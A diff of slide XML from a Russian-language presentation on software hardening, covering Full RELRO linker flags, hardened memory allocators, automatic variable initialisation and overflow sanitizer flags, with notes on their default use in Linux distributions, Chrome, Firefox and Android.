               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F65176-1DCF-40BE-BC3B-1D07413D3E26}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E792084D-322A-4CB9-A936-45119E748D0D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35743,15 +35602,15 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Full RELRO: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
+              <a:t>Hardened allocators: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -35761,7 +35620,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B75EE06-796F-4150-9967-C80D9D14B36F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{383FC83D-DCD4-4DBF-AB24-B5AB31F5E207}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35781,156 +35640,180 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Опции линкера для включения </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Full RELRO:</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>О</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>бычно</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t> </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-Wl,-z,now -Wl,-z,relro</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>просто </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LD_PRELOAD=path/to/allocator.so</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверки в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Glibc </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включаются по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>MALLOC_CHECK_=3 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GLIBC_TUNABLES=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>glibc.malloc.check</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>=3</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах:</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В Ubuntu включены по умолчанию в GCC, но не в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>только </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>partial RELRO</a:t>
+              <a:t>Большинство дистрибутивов </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Linux </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>используют </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Glibc</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Scudo </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>по дефолту</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> hardened-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>аллокатор </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>PartitionAlloc</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Efficient And Safe Allocations Everywhere!</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardened </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>аллокатор</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> :(</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В Debian и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не включены по умолчанию ни в GCC, ни в Clang</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Firefox and Chromium: Memory Allocator Hardening</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и Fefora пакеты дефолтно собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>F</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>ull RELRO</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В пакетах Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Full RELRO</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> дефолтно не включён</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён по дефолту в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>BUILD.gn</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>flags.configure</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -35940,7 +35823,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9411C1E-D413-45A8-A79C-2EA0BE521325}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A5120B-FAAA-4EA3-9261-D059D90B41ED}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35967,7 +35850,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1630769243"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2015695599"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -35999,7 +35882,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{206086E6-A33E-46F6-89CA-5172D4106391}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F65176-1DCF-40BE-BC3B-1D07413D3E26}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36016,20 +35899,16 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Автоинициализация</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>?</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Full RELRO: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -36039,7 +35918,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD57FE3-4034-4B4E-B24F-5F1FE30BF457}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B75EE06-796F-4150-9967-C80D9D14B36F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36053,13 +35932,77 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Флаг -ftrivial-auto-var-init=zero в GCC и Clang</a:t>
+              <a:t>Опции линкера для включения </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Full RELRO:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-Wl,-z,now -Wl,-z,relro</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В Ubuntu включены по умолчанию в GCC, но не в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>только </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>partial RELRO</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В Debian и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не включены по умолчанию ни в GCC, ни в Clang</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -36067,162 +36010,85 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не включён по умолчанию в компиляторе в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu, Debian, Fedora</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Скрытый флаг </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>initiall</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Visual Studio</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и Fefora пакеты дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>F</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>ull RELRO</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не включён по умолчанию в пакетах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu, Debian, Fedora</a:t>
-            </a:r>
+              <a:t>В пакетах Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Full RELRO</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> дефолтно не включён</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Дискуссия в трекере </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu (</a:t>
+              <a:t>Включён по дефолту в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>#1972043</a:t>
+              <a:t>BUILD.gn</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>)</a:t>
             </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён в Chrome (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
                 <a:hlinkClick r:id="rId3"/>
               </a:rPr>
-              <a:t>Chromium #</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>40633061</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>flags.configure</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t>)</a:t>
             </a:r>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Исправление и отключение hot paths заняло ~4 месяца</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пока не включён в Firefox (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>Trivial Auto Var Init Experiments</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android user</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>- и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>kernelspace</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="sv-SE" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>System hardening in Android 11</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -36231,7 +36097,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44EDC4A3-65C4-4E94-A281-A0BE05178B80}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9411C1E-D413-45A8-A79C-2EA0BE521325}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36258,7 +36124,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1607254691"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1630769243"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -36290,7 +36156,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E390CB5-FF6E-4765-B937-FC6BA0EF02FC}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{206086E6-A33E-46F6-89CA-5172D4106391}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36308,7 +36174,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Целочисленные переполнения</a:t>
+              <a:t>Автоинициализация</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -36330,7 +36196,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAADEE4F-0571-446A-90C7-1E44732CD1C9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD57FE3-4034-4B4E-B24F-5F1FE30BF457}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36344,276 +36210,176 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+            <a:normAutofit fontScale="92500"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Флаг -ftrivial-auto-var-init=zero в GCC и Clang</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не включён по умолчанию в компиляторе в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu, Debian, Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Скрытый флаг </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-trap=signed-integer-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>overflow,pointer</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-overflow</a:t>
-            </a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>initiall</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Visual Studio</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не поддерживает </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>integer</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не включён по умолчанию в пакетах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu, Debian, Fedora</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ещё раз отметим что </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
